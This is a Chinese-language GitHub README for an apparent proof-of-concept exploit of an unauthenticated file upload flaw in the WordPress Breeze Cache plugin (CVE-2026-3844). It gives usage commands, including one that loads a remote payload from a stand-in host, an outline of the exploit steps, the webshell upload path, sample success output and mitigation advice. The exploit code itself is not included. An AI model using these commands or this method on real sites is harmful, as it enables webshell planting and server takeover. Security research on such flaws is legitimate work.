sahmsec/CVE-2026-3844
GitHub: sahmsec/CVE-2026-3844
针对 WordPress Breeze Cache 插件 2.4.4 及以下版本未认证文件上传漏洞的完整利用 PoC,支持从漏洞检测到远程代码执行验证的全流程。
Stars: 0 | Forks: 0
# CVE-2026-3844 — WordPress Breeze Cache 未认证文件上传
## 概述
本仓库包含一个 Python 概念验证 (PoC) 脚本,用于演示影响 **WordPress Breeze Cache 插件 <= 2.4.4** 的**未认证任意文件上传**漏洞。
## 漏洞信息
* **CVE ID:** CVE-2026-3844
* **受影响插件:** Breeze Cache for WordPress
* **受影响版本:** <= 2.4.4
* **问题类型:** 未认证任意文件上传
* **影响:** 潜在的远程代码执行 (RCE)
* **攻击向量:** 远程 / 未认证
该漏洞滥用 Breeze Cache 的 Gravatar 缓存功能,将攻击者控制的文件存储到 WordPress 缓存目录中。
## 功能
* 漏洞检测模式
* 自动化利用工作流
* Webshell 验证支持
* 彩色终端输出
* 远程 payload 加载
* 上传验证检查
* 可选输出日志记录
## 环境要求
* Python 3.8+
* `pycurl`
* `termcolor`
安装依赖:
```
pip install pycurl termcolor
```
## 文件
| 文件 | 描述 |
| -------------------- | --------------------------- |
| `CVE-2026-3844.py` | 主要 PoC 利用脚本 |
| `CVE-2026-3844.yaml` | YAML 模板/配置 |
## 用法
### 检查目标是否看起来存在漏洞
```
python3 CVE-2026-3844.py -u http://target.com --check-only
```
### 运行利用程序
```
python3 CVE-2026-3844.py -u http://target.com
```
### 自定义 Payload
```
python3 CVE-2026-3844.py -u http://target.com -p https://example.com/payload.php
```
### 保存结果
```
python3 CVE-2026-3844.py -u http://target.com -o results.txt
```
## 工作原理
该脚本执行以下步骤:
1. 检测已安装的 Breeze Cache 版本
2. 检查插件版本是否存在漏洞
3. 提交构造的 WordPress 评论请求
4. 滥用 Breeze Cache 的 Gravatar 处理机制
5. 等待缓存生成
6. 验证上传的文件是否可访问
7. 测试 payload 响应情况
## 漏洞路径
上传的 payload 可能可以通过以下路径访问:
```
/wp-content/cache/breeze-extra/gravatars/
```
## 备注
成功利用可能取决于是否启用了以下 Breeze 设置:
```
Host Files Locally - Gravatars
```
如果该功能被禁用,利用尝试可能会失败。
## 示例输出
```
[+] Target VULNERABLE (Breeze v2.4.4)
[+] Comment posted successfully
[+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/random.php
[+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!
```
## 免责声明
本仓库提供用于:
* 安全研究
* 教育目的
* 授权渗透测试
* 防御性安全评估
请勿将此项目用于您不拥有或未获得明确测试授权的系统。
作者对本项目的滥用或造成的损害不承担任何责任。
## 缓解建议
网站管理员应:
* 将 Breeze Cache 更新到最新的修补版本
* 禁用不必要的文件缓存功能
* 限制危险的文件上传
* 禁用缓存目录中的 PHP 执行
* 监控 `/wp-content/cache/` 中的可疑文件
* 部署 Web Application Firewall (WAF)
* 实施严格的服务端验证
## 教育目的声明
创建此概念验证旨在帮助:
* 安全研究人员
* 渗透测试人员
* 蓝队
* WordPress 管理员
* 开发人员
了解与不安全缓存机制和任意文件上传相关的安全风险。
## 参考
* CVE 数据库
* WordPress 安全公告
* OWASP 文件上传安全指南
* Breeze Cache 插件文档
## 作者
安全研究 / 教育项目
标签:Breeze Cache, CISA项目, CVE, CVE-2026-3844, Exploit, Gravatar缓存, Maven, PoC, Python, RCE, Webshell, Web安全, WordPress, 任意文件上传, 提示词注入, 数字签名, 无后门, 暴力破解, 未授权漏洞, 漏洞验证, 编程工具, 网络安全, 自动化利用, 蓝队分析, 远程代码执行, 逆向工具, 隐私保护